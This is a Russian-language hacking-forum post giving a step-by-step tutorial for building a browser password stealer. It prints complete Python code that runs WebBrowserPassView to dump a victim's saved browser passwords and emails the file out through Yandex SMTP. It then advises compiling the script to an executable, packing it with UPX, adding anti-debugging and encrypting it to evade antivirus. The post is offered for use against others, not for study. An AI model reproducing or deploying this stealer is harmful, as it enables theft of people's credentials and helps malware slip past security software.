1. Гость, мы переехали на новый домен piratebuhta.pw
    Подробней в теме.
    Скрыть объявление

Стиллер на коленке.

Тема в разделе "Вирусология", создана пользователем Trugiat, 5 мар 2019.

  1. Trugiat

    Trugiat Глав.Ком. Разведки
    Разведка

    Репутация:
    380
    Регистрация:
    29 май 2018
    Сообщения:
    546
    Баллы:
    63
    1
    Оценки:
    +284 / -0
    Garant сделок:
    34
    Из чего будет состоять наш стиллер:



    • Программа для восстановления паролей;
    • Программы, которая запустит 1-ю программу и отправит нам эти пароли.
    И так приступим мы собираем стиллер из паблик инструментов, плюс этого заключается в том, что скорее всего антивирусы не так сильно палят их если бы мы сами писали с нуля стиллер.



    Выберем программу для восстановления паролей. Наиболее подходящая нам WebBrowserPassView(все ссылки в конце), но можно найти аналог. Прога поддерживает командную строку и возможность сохранять пароли в файле.

    [​IMG]


    Программу выбрали, теперь нам необходимо написать небольшой скрипт, который будет обладать таким функционалом:



    1)Откроет WebBrowserPassView и сохранит пароли в текстовик.



    2)Отправит текстовик туда куда нам нужно.(я опишу случай отправки на email)



    2.2) А можно просто запустить программу и сделать скрин экрана и отправить скрин.



    Выбираем ЯП. Мы ребята ленивые и нестандартно мыслящие. Мы напишем на Python’e и скомпилируем exe’шник из него.(Это дебилизм, но весело).



    PS: Я пытался написать тоже самое на bat и VSBasic. Были проблемы с брандмауэром, и прочие костыли. На питоне все заработало сразу+ можно расширить функционал.



    Отправлять файл с паролями будем от яндекс почты. Mail ru не отправляет письма так как считает это спам рассылкой, гугл почта тоже может наставить рогули с безопасностью. А вот яндекс работает отлично.



    Письмо(с паролями) отправляет [email protected] а принимает [email protected].



    И так приступим к написанию скрипта.



    Python 2.7





    1)Импортируем библиотеки для работы с SMTP(штука для отправки писем), email(чтобы сформировать email сообщение), os(нужна чтобы запустить программу для востановления паролей) time(Сделать задержку по времени)



    Код:

    import smtplib

    import mimetypes

    import email

    import email.mime.application

    import os

    import time



    2)Запуск программы WebBrowserPassView



    Код:

    os.system(r'WebBrowserPassView.exe /stext passwords.txt')

    /stext сохранить в txt файл(/shtml/sxml на ваш вкус)



    passwords.txt название файла в котором сохранятся пароли.





    3)Делаем задержку в 5 сек. На случай если жертва начнет открывать несколько раз подряд наш файл.



    Код:

    time.sleep(5)

    4)Формируем письмо



    Код:

    msg = email.mime.Multipart.MIMEMultipart()


    ##Тема


    msg['Subject'] = 'Greetings'


    ##От кого, кому


    msg['From'] = '[email protected]'


    msg['To'] = '[email protected]'



    5)Текст письма



    body = email.mime.Text.MIMEText("""Hello, pass



    passwords s s s?""")



    msg.attach(body)





    6)Прикрепряем файл с паролями



    Код:

    filename='passwords.txt'


    fp=open(filename,'rb')


    att = email.mime.application.MIMEApplication(fp.read(),_subtype="txt")


    fp.close()


    att.add_header('Content-Disposition','attachment',filename=filename)


    msg.attach(att)



    7)Выбираем почтовый сервер. В нашем случае yandex.ru.



    Код:

    s = smtplib.SMTP('smtp.yandex.ru')

    s.starttls()

    8)Логинемся на сервере



    [ICODE]s.login('[email protected]','parol_ot_pochta')[/ICODE]



    9)Отправляем письмо.



    [ICODE]s.sendmail('[email protected]',['priem.gmail.com], msg.as_string())[/ICODE]



    10)Закрываем сессию.



    [ICODE]s.quit()[/ICODE]



    Весь наш код



    Код:

    import smtplib

    import mimetypes

    import email

    import email.mime.application

    import os

    import time


    os.system(r'WebBrowserPassView.exe /stext passwords.txt')

    time.sleep(5)


    msg = email.mime.Multipart.MIMEMultipart()

    msg['Subject'] = 'Greetings'

    msg['From'] = '[email protected]'

    msg['To'] = '[email protected]'

    body = email.mime.Text.MIMEText("""Hello, pass

    passwords s s s?""")

    msg.attach(body)

    filename='passwords.txt'

    fp=open(filename,'rb')

    att = email.mime.application.MIMEApplication(fp.read(),_subtype="txt")

    fp.close()

    att.add_header('Content-Disposition','attachment',filename=filename)

    msg.attach(att)

    s = smtplib.SMTP('smtp.yandex.ru')

    s.starttls()

    s.login('[email protected]','parol_ot_pochta')

    s.sendmail('[email protected]',['[email protected]], msg.as_string())

    s.quit()




    Проверяем….





    Работает. Теперь из этой дичи нам необходимо собрать *exe.



    Соберем при помощи Pyinstaller.

    [​IMG]




    Где pyt.py это наш скрипт.



    Создастся папка dist в ней будет наш pyt.exe причем весить будет порядка 5мб. Закинем в папку с pyt.exe файл WebBrowserPassView.exe.



    Запускаем pyt.exe. Работает, создался файл passwords.txt и отправился на почту.



    Теперь можно все это склеить, воспользоваться архиватором.



    При помощи того же python'на я сразу создал exe с WebBrowserPassView в ресурсах, сделал запуск его и сжал upx'om. Вес стал порядка 3мб.



    Тут уже без крипты никуда ибо палевность перед АВ высока. Делаем антиотладку, криптуем благо сильно загоняться тут не надо ведь у нас паблик инструменты и можно было даже обойтись обычным xor криптом.



    Получаем интересного зверька.



    Можно добавить еще функционала в нашу прогу. Можно собрать всю информацию о системе пользователя. Делать скрины экрана. Очень много чего.
     
Похожие темы
  1. inv1s1ble
    Ответов:
    4
    Просмотров:
    456
  2. bash
    Ответов:
    5
    Просмотров:
    2.117
  3. собачий депутат
    Ответов:
    0
    Просмотров:
    484
  4. Slovozaslovo
    Ответов:
    0
    Просмотров:
    164
  5. собачий депутат
    Ответов:
    2
    Просмотров:
    73
Загрузка...
  • О нашем сайте

    piratebuhta.cc это уникальный проект посвященный всем видам заработка в сети, как легальным так и криминальным. Здесь вы сможете ознакомиться со всеми видами обманов и приемов которые используют мошенники, дабы в дальнейшем обезопасить себя.
  • Дисклаймер

    Администрация не несёт никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещённая законами, а так же УК РФ, просим незамедлительно сообщить Администрации.